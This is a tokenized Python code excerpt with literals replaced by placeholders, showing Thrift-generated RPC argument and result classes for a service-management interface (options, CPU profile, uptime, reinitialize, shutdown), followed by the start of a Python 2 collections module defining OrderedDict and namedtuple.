. __name__ , '<STR_LIT:U+002CU+0020>' . join ( L ) ) <EOL> def __eq__ ( self , other ) : <EOL> return isinstance ( other , self . __class__ ) and self . __dict__ == other . __dict__ <EOL> def __ne__ ( self , other ) : <EOL> return not ( self == other ) <EOL> class setOption_args : <EOL> """<STR_LIT>""" <EOL> thrift_spec = ( <EOL> None , <EOL> ( <NUM_LIT:1> , TType . STRING , '<STR_LIT:key>' , None , None , ) , <EOL> ( <NUM_LIT:2> , TType . STRING , '<STR_LIT:value>' , None , None , ) , <EOL> ) <EOL> def __init__ ( self , key = None , value = None , ) : <EOL> self . key = key <EOL> self . value = value <EOL> def read ( self , iprot ) : <EOL> if iprot . __class__ == TBinaryProtocol . 
TBinaryProtocolAccelerated and isinstance ( iprot . trans , TTransport . CReadableTransport ) and self . thrift_spec is not None and fastbinary is not None : <EOL> fastbinary . decode_binary ( self , iprot . trans , ( self . __class__ , self . thrift_spec ) ) <EOL> return <EOL> iprot . readStructBegin ( ) <EOL> while True : <EOL> ( fname , ftype , fid ) = iprot . readFieldBegin ( ) <EOL> if ftype == TType . STOP : <EOL> break <EOL> if fid == <NUM_LIT:1> : <EOL> if ftype == TType . STRING : <EOL> self . key = iprot . readString ( ) ; <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> elif fid == <NUM_LIT:2> : <EOL> if ftype == TType . STRING : <EOL> self . value = iprot . readString ( ) ; <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> iprot . readFieldEnd ( ) <EOL> iprot . readStructEnd ( ) <EOL> def write ( self , oprot ) : <EOL> if oprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and self . thrift_spec is not None and fastbinary is not None : <EOL> oprot . trans . write ( fastbinary . encode_binary ( self , ( self . __class__ , self . thrift_spec ) ) ) <EOL> return <EOL> oprot . writeStructBegin ( '<STR_LIT>' ) <EOL> if self . key != None : <EOL> oprot . writeFieldBegin ( '<STR_LIT:key>' , TType . STRING , <NUM_LIT:1> ) <EOL> oprot . writeString ( self . key ) <EOL> oprot . writeFieldEnd ( ) <EOL> if self . value != None : <EOL> oprot . writeFieldBegin ( '<STR_LIT:value>' , TType . STRING , <NUM_LIT:2> ) <EOL> oprot . writeString ( self . value ) <EOL> oprot . writeFieldEnd ( ) <EOL> oprot . writeFieldStop ( ) <EOL> oprot . writeStructEnd ( ) <EOL> def validate ( self ) : <EOL> return <EOL> def __repr__ ( self ) : <EOL> L = [ '<STR_LIT>' % ( key , value ) <EOL> for key , value in self . __dict__ . iteritems ( ) ] <EOL> return '<STR_LIT>' % ( self . __class__ . __name__ , '<STR_LIT:U+002CU+0020>' . join ( L ) ) <EOL> def __eq__ ( self , other ) : <EOL> return isinstance ( other , self . __class__ ) and self . 
__dict__ == other . __dict__ <EOL> def __ne__ ( self , other ) : <EOL> return not ( self == other ) <EOL> class setOption_result : <EOL> thrift_spec = ( <EOL> ) <EOL> def read ( self , iprot ) : <EOL> if iprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and isinstance ( iprot . trans , TTransport . CReadableTransport ) and self . thrift_spec is not None and fastbinary is not None : <EOL> fastbinary . decode_binary ( self , iprot . trans , ( self . __class__ , self . thrift_spec ) ) <EOL> return <EOL> iprot . readStructBegin ( ) <EOL> while True : <EOL> ( fname , ftype , fid ) = iprot . readFieldBegin ( ) <EOL> if ftype == TType . STOP : <EOL> break <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> iprot . readFieldEnd ( ) <EOL> iprot . readStructEnd ( ) <EOL> def write ( self , oprot ) : <EOL> if oprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and self . thrift_spec is not None and fastbinary is not None : <EOL> oprot . trans . write ( fastbinary . encode_binary ( self , ( self . __class__ , self . thrift_spec ) ) ) <EOL> return <EOL> oprot . writeStructBegin ( '<STR_LIT>' ) <EOL> oprot . writeFieldStop ( ) <EOL> oprot . writeStructEnd ( ) <EOL> def validate ( self ) : <EOL> return <EOL> def __repr__ ( self ) : <EOL> L = [ '<STR_LIT>' % ( key , value ) <EOL> for key , value in self . __dict__ . iteritems ( ) ] <EOL> return '<STR_LIT>' % ( self . __class__ . __name__ , '<STR_LIT:U+002CU+0020>' . join ( L ) ) <EOL> def __eq__ ( self , other ) : <EOL> return isinstance ( other , self . __class__ ) and self . __dict__ == other . __dict__ <EOL> def __ne__ ( self , other ) : <EOL> return not ( self == other ) <EOL> class getOption_args : <EOL> """<STR_LIT>""" <EOL> thrift_spec = ( <EOL> None , <EOL> ( <NUM_LIT:1> , TType . STRING , '<STR_LIT:key>' , None , None , ) , <EOL> ) <EOL> def __init__ ( self , key = None , ) : <EOL> self . key = key <EOL> def read ( self , iprot ) : <EOL> if iprot . __class__ == TBinaryProtocol . 
TBinaryProtocolAccelerated and isinstance ( iprot . trans , TTransport . CReadableTransport ) and self . thrift_spec is not None and fastbinary is not None : <EOL> fastbinary . decode_binary ( self , iprot . trans , ( self . __class__ , self . thrift_spec ) ) <EOL> return <EOL> iprot . readStructBegin ( ) <EOL> while True : <EOL> ( fname , ftype , fid ) = iprot . readFieldBegin ( ) <EOL> if ftype == TType . STOP : <EOL> break <EOL> if fid == <NUM_LIT:1> : <EOL> if ftype == TType . STRING : <EOL> self . key = iprot . readString ( ) ; <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> iprot . readFieldEnd ( ) <EOL> iprot . readStructEnd ( ) <EOL> def write ( self , oprot ) : <EOL> if oprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and self . thrift_spec is not None and fastbinary is not None : <EOL> oprot . trans . write ( fastbinary . encode_binary ( self , ( self . __class__ , self . thrift_spec ) ) ) <EOL> return <EOL> oprot . writeStructBegin ( '<STR_LIT>' ) <EOL> if self . key != None : <EOL> oprot . writeFieldBegin ( '<STR_LIT:key>' , TType . STRING , <NUM_LIT:1> ) <EOL> oprot . writeString ( self . key ) <EOL> oprot . writeFieldEnd ( ) <EOL> oprot . writeFieldStop ( ) <EOL> oprot . writeStructEnd ( ) <EOL> def validate ( self ) : <EOL> return <EOL> def __repr__ ( self ) : <EOL> L = [ '<STR_LIT>' % ( key , value ) <EOL> for key , value in self . __dict__ . iteritems ( ) ] <EOL> return '<STR_LIT>' % ( self . __class__ . __name__ , '<STR_LIT:U+002CU+0020>' . join ( L ) ) <EOL> def __eq__ ( self , other ) : <EOL> return isinstance ( other , self . __class__ ) and self . __dict__ == other . __dict__ <EOL> def __ne__ ( self , other ) : <EOL> return not ( self == other ) <EOL> class getOption_result : <EOL> """<STR_LIT>""" <EOL> thrift_spec = ( <EOL> ( <NUM_LIT:0> , TType . STRING , '<STR_LIT:success>' , None , None , ) , <EOL> ) <EOL> def __init__ ( self , success = None , ) : <EOL> self . 
success = success <EOL> def read ( self , iprot ) : <EOL> if iprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and isinstance ( iprot . trans , TTransport . CReadableTransport ) and self . thrift_spec is not None and fastbinary is not None : <EOL> fastbinary . decode_binary ( self , iprot . trans , ( self . __class__ , self . thrift_spec ) ) <EOL> return <EOL> iprot . readStructBegin ( ) <EOL> while True : <EOL> ( fname , ftype , fid ) = iprot . readFieldBegin ( ) <EOL> if ftype == TType . STOP : <EOL> break <EOL> if fid == <NUM_LIT:0> : <EOL> if ftype == TType . STRING : <EOL> self . success = iprot . readString ( ) ; <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> iprot . readFieldEnd ( ) <EOL> iprot . readStructEnd ( ) <EOL> def write ( self , oprot ) : <EOL> if oprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and self . thrift_spec is not None and fastbinary is not None : <EOL> oprot . trans . write ( fastbinary . encode_binary ( self , ( self . __class__ , self . thrift_spec ) ) ) <EOL> return <EOL> oprot . writeStructBegin ( '<STR_LIT>' ) <EOL> if self . success != None : <EOL> oprot . writeFieldBegin ( '<STR_LIT:success>' , TType . STRING , <NUM_LIT:0> ) <EOL> oprot . writeString ( self . success ) <EOL> oprot . writeFieldEnd ( ) <EOL> oprot . writeFieldStop ( ) <EOL> oprot . writeStructEnd ( ) <EOL> def validate ( self ) : <EOL> return <EOL> def __repr__ ( self ) : <EOL> L = [ '<STR_LIT>' % ( key , value ) <EOL> for key , value in self . __dict__ . iteritems ( ) ] <EOL> return '<STR_LIT>' % ( self . __class__ . __name__ , '<STR_LIT:U+002CU+0020>' . join ( L ) ) <EOL> def __eq__ ( self , other ) : <EOL> return isinstance ( other , self . __class__ ) and self . __dict__ == other . __dict__ <EOL> def __ne__ ( self , other ) : <EOL> return not ( self == other ) <EOL> class getOptions_args : <EOL> thrift_spec = ( <EOL> ) <EOL> def read ( self , iprot ) : <EOL> if iprot . 
__class__ == TBinaryProtocol . TBinaryProtocolAccelerated and isinstance ( iprot . trans , TTransport . CReadableTransport ) and self . thrift_spec is not None and fastbinary is not None : <EOL> fastbinary . decode_binary ( self , iprot . trans , ( self . __class__ , self . thrift_spec ) ) <EOL> return <EOL> iprot . readStructBegin ( ) <EOL> while True : <EOL> ( fname , ftype , fid ) = iprot . readFieldBegin ( ) <EOL> if ftype == TType . STOP : <EOL> break <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> iprot . readFieldEnd ( ) <EOL> iprot . readStructEnd ( ) <EOL> def write ( self , oprot ) : <EOL> if oprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and self . thrift_spec is not None and fastbinary is not None : <EOL> oprot . trans . write ( fastbinary . encode_binary ( self , ( self . __class__ , self . thrift_spec ) ) ) <EOL> return <EOL> oprot . writeStructBegin ( '<STR_LIT>' ) <EOL> oprot . writeFieldStop ( ) <EOL> oprot . writeStructEnd ( ) <EOL> def validate ( self ) : <EOL> return <EOL> def __repr__ ( self ) : <EOL> L = [ '<STR_LIT>' % ( key , value ) <EOL> for key , value in self . __dict__ . iteritems ( ) ] <EOL> return '<STR_LIT>' % ( self . __class__ . __name__ , '<STR_LIT:U+002CU+0020>' . join ( L ) ) <EOL> def __eq__ ( self , other ) : <EOL> return isinstance ( other , self . __class__ ) and self . __dict__ == other . __dict__ <EOL> def __ne__ ( self , other ) : <EOL> return not ( self == other ) <EOL> class getOptions_result : <EOL> """<STR_LIT>""" <EOL> thrift_spec = ( <EOL> ( <NUM_LIT:0> , TType . MAP , '<STR_LIT:success>' , ( TType . STRING , None , TType . STRING , None ) , None , ) , <EOL> ) <EOL> def __init__ ( self , success = None , ) : <EOL> self . success = success <EOL> def read ( self , iprot ) : <EOL> if iprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and isinstance ( iprot . trans , TTransport . CReadableTransport ) and self . thrift_spec is not None and fastbinary is not None : <EOL> fastbinary . 
decode_binary ( self , iprot . trans , ( self . __class__ , self . thrift_spec ) ) <EOL> return <EOL> iprot . readStructBegin ( ) <EOL> while True : <EOL> ( fname , ftype , fid ) = iprot . readFieldBegin ( ) <EOL> if ftype == TType . STOP : <EOL> break <EOL> if fid == <NUM_LIT:0> : <EOL> if ftype == TType . MAP : <EOL> self . success = { } <EOL> ( _ktype10 , _vtype11 , _size9 ) = iprot . readMapBegin ( ) <EOL> for _i13 in xrange ( _size9 ) : <EOL> _key14 = iprot . readString ( ) ; <EOL> _val15 = iprot . readString ( ) ; <EOL> self . success [ _key14 ] = _val15 <EOL> iprot . readMapEnd ( ) <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> iprot . readFieldEnd ( ) <EOL> iprot . readStructEnd ( ) <EOL> def write ( self , oprot ) : <EOL> if oprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and self . thrift_spec is not None and fastbinary is not None : <EOL> oprot . trans . write ( fastbinary . encode_binary ( self , ( self . __class__ , self . thrift_spec ) ) ) <EOL> return <EOL> oprot . writeStructBegin ( '<STR_LIT>' ) <EOL> if self . success != None : <EOL> oprot . writeFieldBegin ( '<STR_LIT:success>' , TType . MAP , <NUM_LIT:0> ) <EOL> oprot . writeMapBegin ( TType . STRING , TType . STRING , len ( self . success ) ) <EOL> for kiter16 , viter17 in self . success . items ( ) : <EOL> oprot . writeString ( kiter16 ) <EOL> oprot . writeString ( viter17 ) <EOL> oprot . writeMapEnd ( ) <EOL> oprot . writeFieldEnd ( ) <EOL> oprot . writeFieldStop ( ) <EOL> oprot . writeStructEnd ( ) <EOL> def validate ( self ) : <EOL> return <EOL> def __repr__ ( self ) : <EOL> L = [ '<STR_LIT>' % ( key , value ) <EOL> for key , value in self . __dict__ . iteritems ( ) ] <EOL> return '<STR_LIT>' % ( self . __class__ . __name__ , '<STR_LIT:U+002CU+0020>' . join ( L ) ) <EOL> def __eq__ ( self , other ) : <EOL> return isinstance ( other , self . __class__ ) and self . __dict__ == other . 
__dict__ <EOL> def __ne__ ( self , other ) : <EOL> return not ( self == other ) <EOL> class getCpuProfile_args : <EOL> """<STR_LIT>""" <EOL> thrift_spec = ( <EOL> None , <EOL> ( <NUM_LIT:1> , TType . I32 , '<STR_LIT>' , None , None , ) , <EOL> ) <EOL> def __init__ ( self , profileDurationInSec = None , ) : <EOL> self . profileDurationInSec = profileDurationInSec <EOL> def read ( self , iprot ) : <EOL> if iprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and isinstance ( iprot . trans , TTransport . CReadableTransport ) and self . thrift_spec is not None and fastbinary is not None : <EOL> fastbinary . decode_binary ( self , iprot . trans , ( self . __class__ , self . thrift_spec ) ) <EOL> return <EOL> iprot . readStructBegin ( ) <EOL> while True : <EOL> ( fname , ftype , fid ) = iprot . readFieldBegin ( ) <EOL> if ftype == TType . STOP : <EOL> break <EOL> if fid == <NUM_LIT:1> : <EOL> if ftype == TType . I32 : <EOL> self . profileDurationInSec = iprot . readI32 ( ) ; <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> iprot . readFieldEnd ( ) <EOL> iprot . readStructEnd ( ) <EOL> def write ( self , oprot ) : <EOL> if oprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and self . thrift_spec is not None and fastbinary is not None : <EOL> oprot . trans . write ( fastbinary . encode_binary ( self , ( self . __class__ , self . thrift_spec ) ) ) <EOL> return <EOL> oprot . writeStructBegin ( '<STR_LIT>' ) <EOL> if self . profileDurationInSec != None : <EOL> oprot . writeFieldBegin ( '<STR_LIT>' , TType . I32 , <NUM_LIT:1> ) <EOL> oprot . writeI32 ( self . profileDurationInSec ) <EOL> oprot . writeFieldEnd ( ) <EOL> oprot . writeFieldStop ( ) <EOL> oprot . writeStructEnd ( ) <EOL> def validate ( self ) : <EOL> return <EOL> def __repr__ ( self ) : <EOL> L = [ '<STR_LIT>' % ( key , value ) <EOL> for key , value in self . __dict__ . iteritems ( ) ] <EOL> return '<STR_LIT>' % ( self . __class__ . 
__name__ , '<STR_LIT:U+002CU+0020>' . join ( L ) ) <EOL> def __eq__ ( self , other ) : <EOL> return isinstance ( other , self . __class__ ) and self . __dict__ == other . __dict__ <EOL> def __ne__ ( self , other ) : <EOL> return not ( self == other ) <EOL> class getCpuProfile_result : <EOL> """<STR_LIT>""" <EOL> thrift_spec = ( <EOL> ( <NUM_LIT:0> , TType . STRING , '<STR_LIT:success>' , None , None , ) , <EOL> ) <EOL> def __init__ ( self , success = None , ) : <EOL> self . success = success <EOL> def read ( self , iprot ) : <EOL> if iprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and isinstance ( iprot . trans , TTransport . CReadableTransport ) and self . thrift_spec is not None and fastbinary is not None : <EOL> fastbinary . decode_binary ( self , iprot . trans , ( self . __class__ , self . thrift_spec ) ) <EOL> return <EOL> iprot . readStructBegin ( ) <EOL> while True : <EOL> ( fname , ftype , fid ) = iprot . readFieldBegin ( ) <EOL> if ftype == TType . STOP : <EOL> break <EOL> if fid == <NUM_LIT:0> : <EOL> if ftype == TType . STRING : <EOL> self . success = iprot . readString ( ) ; <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> iprot . readFieldEnd ( ) <EOL> iprot . readStructEnd ( ) <EOL> def write ( self , oprot ) : <EOL> if oprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and self . thrift_spec is not None and fastbinary is not None : <EOL> oprot . trans . write ( fastbinary . encode_binary ( self , ( self . __class__ , self . thrift_spec ) ) ) <EOL> return <EOL> oprot . writeStructBegin ( '<STR_LIT>' ) <EOL> if self . success != None : <EOL> oprot . writeFieldBegin ( '<STR_LIT:success>' , TType . STRING , <NUM_LIT:0> ) <EOL> oprot . writeString ( self . success ) <EOL> oprot . writeFieldEnd ( ) <EOL> oprot . writeFieldStop ( ) <EOL> oprot . 
writeStructEnd ( ) <EOL> def validate ( self ) : <EOL> return <EOL> def __repr__ ( self ) : <EOL> L = [ '<STR_LIT>' % ( key , value ) <EOL> for key , value in self . __dict__ . iteritems ( ) ] <EOL> return '<STR_LIT>' % ( self . __class__ . __name__ , '<STR_LIT:U+002CU+0020>' . join ( L ) ) <EOL> def __eq__ ( self , other ) : <EOL> return isinstance ( other , self . __class__ ) and self . __dict__ == other . __dict__ <EOL> def __ne__ ( self , other ) : <EOL> return not ( self == other ) <EOL> class aliveSince_args : <EOL> thrift_spec = ( <EOL> ) <EOL> def read ( self , iprot ) : <EOL> if iprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and isinstance ( iprot . trans , TTransport . CReadableTransport ) and self . thrift_spec is not None and fastbinary is not None : <EOL> fastbinary . decode_binary ( self , iprot . trans , ( self . __class__ , self . thrift_spec ) ) <EOL> return <EOL> iprot . readStructBegin ( ) <EOL> while True : <EOL> ( fname , ftype , fid ) = iprot . readFieldBegin ( ) <EOL> if ftype == TType . STOP : <EOL> break <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> iprot . readFieldEnd ( ) <EOL> iprot . readStructEnd ( ) <EOL> def write ( self , oprot ) : <EOL> if oprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and self . thrift_spec is not None and fastbinary is not None : <EOL> oprot . trans . write ( fastbinary . encode_binary ( self , ( self . __class__ , self . thrift_spec ) ) ) <EOL> return <EOL> oprot . writeStructBegin ( '<STR_LIT>' ) <EOL> oprot . writeFieldStop ( ) <EOL> oprot . writeStructEnd ( ) <EOL> def validate ( self ) : <EOL> return <EOL> def __repr__ ( self ) : <EOL> L = [ '<STR_LIT>' % ( key , value ) <EOL> for key , value in self . __dict__ . iteritems ( ) ] <EOL> return '<STR_LIT>' % ( self . __class__ . __name__ , '<STR_LIT:U+002CU+0020>' . join ( L ) ) <EOL> def __eq__ ( self , other ) : <EOL> return isinstance ( other , self . __class__ ) and self . __dict__ == other . 
__dict__ <EOL> def __ne__ ( self , other ) : <EOL> return not ( self == other ) <EOL> class aliveSince_result : <EOL> """<STR_LIT>""" <EOL> thrift_spec = ( <EOL> ( <NUM_LIT:0> , TType . I64 , '<STR_LIT:success>' , None , None , ) , <EOL> ) <EOL> def __init__ ( self , success = None , ) : <EOL> self . success = success <EOL> def read ( self , iprot ) : <EOL> if iprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and isinstance ( iprot . trans , TTransport . CReadableTransport ) and self . thrift_spec is not None and fastbinary is not None : <EOL> fastbinary . decode_binary ( self , iprot . trans , ( self . __class__ , self . thrift_spec ) ) <EOL> return <EOL> iprot . readStructBegin ( ) <EOL> while True : <EOL> ( fname , ftype , fid ) = iprot . readFieldBegin ( ) <EOL> if ftype == TType . STOP : <EOL> break <EOL> if fid == <NUM_LIT:0> : <EOL> if ftype == TType . I64 : <EOL> self . success = iprot . readI64 ( ) ; <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> iprot . readFieldEnd ( ) <EOL> iprot . readStructEnd ( ) <EOL> def write ( self , oprot ) : <EOL> if oprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and self . thrift_spec is not None and fastbinary is not None : <EOL> oprot . trans . write ( fastbinary . encode_binary ( self , ( self . __class__ , self . thrift_spec ) ) ) <EOL> return <EOL> oprot . writeStructBegin ( '<STR_LIT>' ) <EOL> if self . success != None : <EOL> oprot . writeFieldBegin ( '<STR_LIT:success>' , TType . I64 , <NUM_LIT:0> ) <EOL> oprot . writeI64 ( self . success ) <EOL> oprot . writeFieldEnd ( ) <EOL> oprot . writeFieldStop ( ) <EOL> oprot . writeStructEnd ( ) <EOL> def validate ( self ) : <EOL> return <EOL> def __repr__ ( self ) : <EOL> L = [ '<STR_LIT>' % ( key , value ) <EOL> for key , value in self . __dict__ . iteritems ( ) ] <EOL> return '<STR_LIT>' % ( self . __class__ . __name__ , '<STR_LIT:U+002CU+0020>' . 
join ( L ) ) <EOL> def __eq__ ( self , other ) : <EOL> return isinstance ( other , self . __class__ ) and self . __dict__ == other . __dict__ <EOL> def __ne__ ( self , other ) : <EOL> return not ( self == other ) <EOL> class reinitialize_args : <EOL> thrift_spec = ( <EOL> ) <EOL> def read ( self , iprot ) : <EOL> if iprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and isinstance ( iprot . trans , TTransport . CReadableTransport ) and self . thrift_spec is not None and fastbinary is not None : <EOL> fastbinary . decode_binary ( self , iprot . trans , ( self . __class__ , self . thrift_spec ) ) <EOL> return <EOL> iprot . readStructBegin ( ) <EOL> while True : <EOL> ( fname , ftype , fid ) = iprot . readFieldBegin ( ) <EOL> if ftype == TType . STOP : <EOL> break <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> iprot . readFieldEnd ( ) <EOL> iprot . readStructEnd ( ) <EOL> def write ( self , oprot ) : <EOL> if oprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and self . thrift_spec is not None and fastbinary is not None : <EOL> oprot . trans . write ( fastbinary . encode_binary ( self , ( self . __class__ , self . thrift_spec ) ) ) <EOL> return <EOL> oprot . writeStructBegin ( '<STR_LIT>' ) <EOL> oprot . writeFieldStop ( ) <EOL> oprot . writeStructEnd ( ) <EOL> def validate ( self ) : <EOL> return <EOL> def __repr__ ( self ) : <EOL> L = [ '<STR_LIT>' % ( key , value ) <EOL> for key , value in self . __dict__ . iteritems ( ) ] <EOL> return '<STR_LIT>' % ( self . __class__ . __name__ , '<STR_LIT:U+002CU+0020>' . join ( L ) ) <EOL> def __eq__ ( self , other ) : <EOL> return isinstance ( other , self . __class__ ) and self . __dict__ == other . __dict__ <EOL> def __ne__ ( self , other ) : <EOL> return not ( self == other ) <EOL> class shutdown_args : <EOL> thrift_spec = ( <EOL> ) <EOL> def read ( self , iprot ) : <EOL> if iprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and isinstance ( iprot . trans , TTransport . 
CReadableTransport ) and self . thrift_spec is not None and fastbinary is not None : <EOL> fastbinary . decode_binary ( self , iprot . trans , ( self . __class__ , self . thrift_spec ) ) <EOL> return <EOL> iprot . readStructBegin ( ) <EOL> while True : <EOL> ( fname , ftype , fid ) = iprot . readFieldBegin ( ) <EOL> if ftype == TType . STOP : <EOL> break <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> iprot . readFieldEnd ( ) <EOL> iprot . readStructEnd ( ) <EOL> def write ( self , oprot ) : <EOL> if oprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and self . thrift_spec is not None and fastbinary is not None : <EOL> oprot . trans . write ( fastbinary . encode_binary ( self , ( self . __class__ , self . thrift_spec ) ) ) <EOL> return <EOL> oprot . writeStructBegin ( '<STR_LIT>' ) <EOL> oprot . writeFieldStop ( ) <EOL> oprot . writeStructEnd ( ) <EOL> def validate ( self ) : <EOL> return <EOL> def __repr__ ( self ) : <EOL> L = [ '<STR_LIT>' % ( key , value ) <EOL> for key , value in self . __dict__ . iteritems ( ) ] <EOL> return '<STR_LIT>' % ( self . __class__ . __name__ , '<STR_LIT:U+002CU+0020>' . join ( L ) ) <EOL> def __eq__ ( self , other ) : <EOL> return isinstance ( other , self . __class__ ) and self . __dict__ == other . __dict__ <EOL> def __ne__ ( self , other ) : <EOL> return not ( self == other ) </s>
<s> __all__ = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> from _abcoll import * <EOL> import _abcoll <EOL> __all__ += _abcoll . __all__ <EOL> from _collections import deque , defaultdict <EOL> from operator import itemgetter as _itemgetter , eq as _eq <EOL> from keyword import iskeyword as _iskeyword <EOL> import sys as _sys <EOL> import heapq as _heapq <EOL> from itertools import repeat as _repeat , chain as _chain , starmap as _starmap , ifilter as _ifilter , imap as _imap <EOL> class OrderedDict ( dict , MutableMapping ) : <EOL> '<STR_LIT>' <EOL> def __init__ ( self , * args , ** kwds ) : <EOL> '''<STR_LIT>''' <EOL> if len ( args ) > <NUM_LIT:1> : <EOL> raise TypeError ( '<STR_LIT>' % len ( args ) ) <EOL> try : <EOL> self . __root <EOL> except AttributeError : <EOL> self . __root = root = [ None , None , None ] <EOL> PREV = <NUM_LIT:0> <EOL> NEXT = <NUM_LIT:1> <EOL> root [ PREV ] = root [ NEXT ] = root <EOL> self . __map = { } <EOL> self . update ( * args , ** kwds ) <EOL> def __setitem__ ( self , key , value , PREV = <NUM_LIT:0> , NEXT = <NUM_LIT:1> , dict_setitem = dict . __setitem__ ) : <EOL> '<STR_LIT>' <EOL> if key not in self : <EOL> root = self . __root <EOL> last = root [ PREV ] <EOL> last [ NEXT ] = root [ PREV ] = self . __map [ key ] = [ last , root , key ] <EOL> dict_setitem ( self , key , value ) <EOL> def __delitem__ ( self , key , PREV = <NUM_LIT:0> , NEXT = <NUM_LIT:1> , dict_delitem = dict . __delitem__ ) : <EOL> '<STR_LIT>' <EOL> dict_delitem ( self , key ) <EOL> link = self . __map . pop ( key ) <EOL> link_prev = link [ PREV ] <EOL> link_next = link [ NEXT ] <EOL> link_prev [ NEXT ] = link_next <EOL> link_next [ PREV ] = link_prev <EOL> def __iter__ ( self , NEXT = <NUM_LIT:1> , KEY = <NUM_LIT:2> ) : <EOL> '<STR_LIT>' <EOL> root = self . 
__root <EOL> curr = root [ NEXT ] <EOL> while curr is not root : <EOL> yield curr [ KEY ] <EOL> curr = curr [ NEXT ] <EOL> def __reversed__ ( self , PREV = <NUM_LIT:0> , KEY = <NUM_LIT:2> ) : <EOL> '<STR_LIT>' <EOL> root = self . __root <EOL> curr = root [ PREV ] <EOL> while curr is not root : <EOL> yield curr [ KEY ] <EOL> curr = curr [ PREV ] <EOL> def __reduce__ ( self ) : <EOL> '<STR_LIT>' <EOL> items = [ [ k , self [ k ] ] for k in self ] <EOL> tmp = self . __map , self . __root <EOL> del self . __map , self . __root <EOL> inst_dict = vars ( self ) . copy ( ) <EOL> self . __map , self . __root = tmp <EOL> if inst_dict : <EOL> return ( self . __class__ , ( items , ) , inst_dict ) <EOL> return self . __class__ , ( items , ) <EOL> def clear ( self ) : <EOL> '<STR_LIT>' <EOL> try : <EOL> for node in self . __map . itervalues ( ) : <EOL> del node [ : ] <EOL> self . __root [ : ] = [ self . __root , self . __root , None ] <EOL> self . __map . clear ( ) <EOL> except AttributeError : <EOL> pass <EOL> dict . clear ( self ) <EOL> setdefault = MutableMapping . setdefault <EOL> update = MutableMapping . update <EOL> pop = MutableMapping . pop <EOL> keys = MutableMapping . keys <EOL> values = MutableMapping . values <EOL> items = MutableMapping . items <EOL> iterkeys = MutableMapping . iterkeys <EOL> itervalues = MutableMapping . itervalues <EOL> iteritems = MutableMapping . iteritems <EOL> __ne__ = MutableMapping . __ne__ <EOL> def popitem ( self , last = True ) : <EOL> '''<STR_LIT>''' <EOL> if not self : <EOL> raise KeyError ( '<STR_LIT>' ) <EOL> key = next ( reversed ( self ) if last else iter ( self ) ) <EOL> value = self . pop ( key ) <EOL> return key , value <EOL> def __repr__ ( self ) : <EOL> '<STR_LIT>' <EOL> if not self : <EOL> return '<STR_LIT>' % ( self . __class__ . __name__ , ) <EOL> return '<STR_LIT>' % ( self . __class__ . __name__ , self . items ( ) ) <EOL> def copy ( self ) : <EOL> '<STR_LIT>' <EOL> return self . 
__class__ ( self ) <EOL> @ classmethod <EOL> def fromkeys ( cls , iterable , value = None ) : <EOL> '''<STR_LIT>''' <EOL> d = cls ( ) <EOL> for key in iterable : <EOL> d [ key ] = value <EOL> return d <EOL> def __eq__ ( self , other ) : <EOL> '''<STR_LIT>''' <EOL> if isinstance ( other , OrderedDict ) : <EOL> return len ( self ) == len ( other ) and all ( _imap ( _eq , self . iteritems ( ) , other . iteritems ( ) ) ) <EOL> return dict . __eq__ ( self , other ) <EOL> def __del__ ( self ) : <EOL> self . clear ( ) <EOL> def namedtuple ( typename , field_names , verbose = False , rename = False ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( field_names , basestring ) : <EOL> field_names = field_names . replace ( '<STR_LIT:U+002C>' , '<STR_LIT:U+0020>' ) . split ( ) <EOL> field_names = tuple ( map ( str , field_names ) ) <EOL> if rename : <EOL> names = list ( field_names ) <EOL> seen = set ( ) <EOL> for i , name in enumerate ( names ) : <EOL> if ( not all ( c . isalnum ( ) or c == '<STR_LIT:_>' for c in name ) or _iskeyword ( name ) <EOL> or not name or name [ <NUM_LIT:0> ] . isdigit ( ) or name . startswith ( '<STR_LIT:_>' ) <EOL> or name in seen ) : <EOL> names [ i ] = '<STR_LIT>' % i <EOL> seen . add ( name ) <EOL> field_names = tuple ( names ) <EOL> for name in ( typename , ) + field_names : <EOL> if not all ( c . isalnum ( ) or c == '<STR_LIT:_>' for c in name ) : <EOL> raise ValueError ( '<STR_LIT>' % name ) <EOL> if _iskeyword ( name ) : <EOL> raise ValueError ( 